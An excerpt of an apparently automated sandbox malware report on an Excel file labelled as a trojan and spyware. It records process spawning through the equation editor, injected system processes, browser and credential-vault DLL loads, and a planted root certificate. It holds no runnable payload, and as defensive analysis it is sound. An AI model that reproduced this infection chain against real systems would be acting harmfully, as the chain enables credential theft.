Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00ADEE4C6_2_00ADEE4C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B5CFB16_2_00B5CFB1
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B32FDC6_2_00B32FDC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AD0F3F6_2_00AD0F3F
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AED0056_2_00AED005
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B3D06D6_2_00B3D06D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AC30406_2_00AC3040
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AD905A6_2_00AD905A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B4D13F6_2_00B4D13F
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B612386_2_00B61238
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00ABF3CF6_2_00ABF3CF
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AC73536_2_00AC7353
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AD14896_2_00AD1489
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AF54856_2_00AF5485
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AFD47D6_2_00AFD47D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B635DA6_2_00B635DA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AC351F6_2_00AC351F
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B4579A6_2_00B4579A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AF57C36_2_00AF57C3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B5771D6_2_00B5771D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B5F8EE6_2_00B5F8EE
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B3F8C46_2_00B3F8C4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B459556_2_00B45955
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B4394B6_2_00B4394B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B73A836_2_00B73A83
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B4DBDA6_2_00B4DBDA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00ABFBD76_2_00ABFBD7
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AE7B006_2_00AE7B00
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B5FDDD6_2_00B5FDDD
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B4BF146_2_00B4BF14
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AEDF7C6_2_00AEDF7C
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61EAB6F38_2_61EAB6F3
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E941FB8_2_61E941FB
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E1519A8_2_61E1519A
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E530C08_2_61E530C0
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E213FB8_2_61E213FB
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E883258_2_61E88325
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E4B5598_2_61E4B559
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E8B53E8_2_61E8B53E
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E1853F8_2_61E1853F
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E874E58_2_61E874E5
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E107218_2_61E10721
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E556B78_2_61E556B7
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E3782E8_2_61E3782E
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E4CBB18_2_61E4CBB1
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E52B5D8_2_61E52B5D
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E31CF88_2_61E31CF8
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E1EC498_2_61E1EC49
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E1DC2C8_2_61E1DC2C
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E25C1C8_2_61E25C1C
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E4FEA88_2_61E4FEA8
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll A15FD84EE61B54C92BB099DFB78226548F43D550C67FB6ADF4CCE3D064AB1C14
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00ABE2A8 appears 60 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00B2F970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00B03F92 appears 132 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00ABDF5C appears 137 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00B0373B appears 253 times
Source: C:\Users\user\AppData\Roaming\word.exeCode function: String function: 00445975 appears 65 times
Source: C:\Users\user\AppData\Roaming\word.exeCode function: String function: 0041171A appears 37 times
Source: C:\Users\user\AppData\Roaming\word.exeCode function: String function: 0041718C appears 45 times
Source: C:\Users\user\AppData\Roaming\word.exeCode function: String function: 0040E6D0 appears 35 times
Source: sqlite3.dll.8.drStatic PE information: Number of sections : 18 > 10
Source: C:\Windows\SysWOW64\msinfo32.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@10/10@6/5
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0044AF5C GetLastError,FormatMessageW,5_2_0044AF5C
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,5_2_00464422
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004364AA
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,5_2_0045D517
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,5_2_0043701F
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,5_2_0047A999
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,5_2_0043614F
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$IND24072113_1.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC32F.tmpJump to behavior
Source: IND24072113_1.xlsxOLE indicator, Workbook stream: true
Source: C:\Users\user\AppData\Roaming\word.exeCommand line argument: x./5_2_0040D7F0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: msinfo32.exe, 00000008.00000002.672732222.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: msinfo32.exe, 00000008.00000002.672732222.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: msinfo32.exe, 00000008.00000002.672732222.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: msinfo32.exe, 00000008.00000002.672732222.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: msinfo32.exe, 00000008.00000002.672732222.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: msinfo32.exe, 00000008.00000002.672732222.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: msinfo32.exe, 00000008.00000002.672732222.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: msinfo32.exe, 00000008.00000002.672732222.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: msinfo32.exe, 00000008.00000002.672732222.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: IND24072113_1.xlsxVirustotal: Detection: 53%
Source: IND24072113_1.xlsxReversingLabs: Detection: 71%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: odbc32.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mozglue.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wdscore.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: vaultcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: riched32.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: riched20.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeSection loaded: version.dllJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: IND24072113_1.xlsxStatic file information: File size 1976678 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: msinfo32.pdb source: svchost.exe, 00000006.00000003.529880228.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, XAgFxCrXhYKjE.exe, 00000007.00000002.670713635.00000000003FB000.00000004.00000001.00020000.00000000.sdmp, XAgFxCrXhYKjE.exe, 00000007.00000003.523531123.00000000003D5000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: msinfo32.pdb@ source: svchost.exe, 00000006.00000003.529880228.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, XAgFxCrXhYKjE.exe, 00000007.00000002.670713635.00000000003FB000.00000004.00000001.00020000.00000000.sdmp, XAgFxCrXhYKjE.exe, 00000007.00000003.523531123.00000000003D5000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XAgFxCrXhYKjE.exe, 00000007.00000000.520856687.00000000008CE000.00000002.00000001.01000000.00000005.sdmp, XAgFxCrXhYKjE.exe, 0000000A.00000002.670905465.00000000008CE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdb source: word.exe, 00000005.00000003.465086662.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, word.exe, 00000005.00000003.464337661.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000002.536511080.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.536511080.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.518776384.0000000000230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.519099529.0000000000460000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000002.671151712.0000000002190000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000003.537338754.0000000001D20000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000003.537635285.0000000001E80000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000002.671151712.0000000002010000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: msinfo32.exe, 00000008.00000002.671662614.00000000028BC000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 00000008.00000002.670668972.0000000000246000.00000004.00000020.00020000.00000000.sdmp, XAgFxCrXhYKjE.exe, 0000000A.00000000.550091041.0000000002C6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.596824366.00000000015FC000.00000004.80000000.00040000.00000000.sdmp
Source: IND24072113_1.xlsxInitial sample: OLE indicators vbamacros = False
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040EB70 LoadLibraryA,GetProcAddress,5_2_0040EB70
Source: kontempt2.1[1].exe.2.drStatic PE information: real checksum: 0xa2135 should be: 0x14f6f3
Source: word.exe.2.drStatic PE information: real checksum: 0xa2135 should be: 0x14f6f3
Source: sqlite3.dll.8.drStatic PE information: section name: /4
Source: sqlite3.dll.8.drStatic PE information: section name: /19
Source: sqlite3.dll.8.drStatic PE information: section name: /31
Source: sqlite3.dll.8.drStatic PE information: section name: /45
Source: sqlite3.dll.8.drStatic PE information: section name: /57
Source: sqlite3.dll.8.drStatic PE information: section name: /70
Source: sqlite3.dll.8.drStatic PE information: section name: /81
Source: sqlite3.dll.8.drStatic PE information: section name: /92
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004171D1 push ecx; ret 5_2_004171E4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040D079 push eax; retf 6_2_0040D086
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004140CE push ds; ret 6_2_004140CF
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041EA53 push ebx; retf 6_2_0041EAAA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00408263 push ebp; iretd 6_2_004082AE
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004122CA push 845B296Ch; iretd 6_2_004122D2
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040AA85 push ds; ret 6_2_0040AB14
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004082AF push ebp; iretd 6_2_004082AE
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040AAB4 push ds; ret 6_2_0040AB14
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00403300 push eax; ret 6_2_00403302
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00411B09 push eax; ret 6_2_00411B0A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00408384 push ebx; iretd 6_2_00408387
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041ABAC push edx; retf 6_2_0041ABAD
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041F463 push edi; retf 6_2_0041F46E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00418CDB push cs; ret 6_2_00418CE1
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00417CEF push FFFFFFBBh; retf 6_2_00417CF2
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004165CF push esi; iretd 6_2_0041665E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00416612 push esi; iretd 6_2_0041665E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004236DA push ebx; iretd 6_2_004236DB
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00ABDFA1 push ecx; ret 6_2_00ABDFB4

Persistence and Installation Behavior

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
